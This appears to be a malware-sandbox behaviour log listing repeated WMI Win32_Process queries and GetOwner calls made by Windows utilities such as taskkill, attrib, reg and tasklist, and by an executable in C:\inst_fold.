Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\reg.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armforce.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armforce.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armforce.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
